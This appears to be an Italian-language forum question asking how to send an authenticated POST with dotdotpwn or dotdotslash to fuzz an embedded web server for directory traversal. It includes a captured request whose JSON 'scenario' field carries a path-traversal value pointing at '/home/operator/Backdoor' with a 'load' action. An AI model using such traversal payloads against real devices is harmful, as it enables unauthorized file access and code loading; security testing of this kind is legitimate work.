Sto provando a confondere un server Web incorporato. Il problema è che le richieste API richiedono l'accesso di un utente inviando una richiesta POST con nome utente e password. Senza la richiesta POST il server restituirà un errore 403. Esiste un modo per inviare questa richiesta POST con dotdotpwn e quindi iniziare a eseguire l'attacco fuzzing di attraversamento della directory? Forse dotdotslash potrebbe funzionare meglio?
Ad esempio:
POST /api/edge/feature.json HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://192.168.2.1/
Content-Type: application/json
X-CSRF-TOKEN: 4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: ip_address_top_user_option=total_bytes; PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7; X-CSRF-TOKEN=4310724fdcab5474ab225a105bd6f86d43247dbaf5b7f4aa2ec329a641ec55ec
Connection: close
{"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load"}}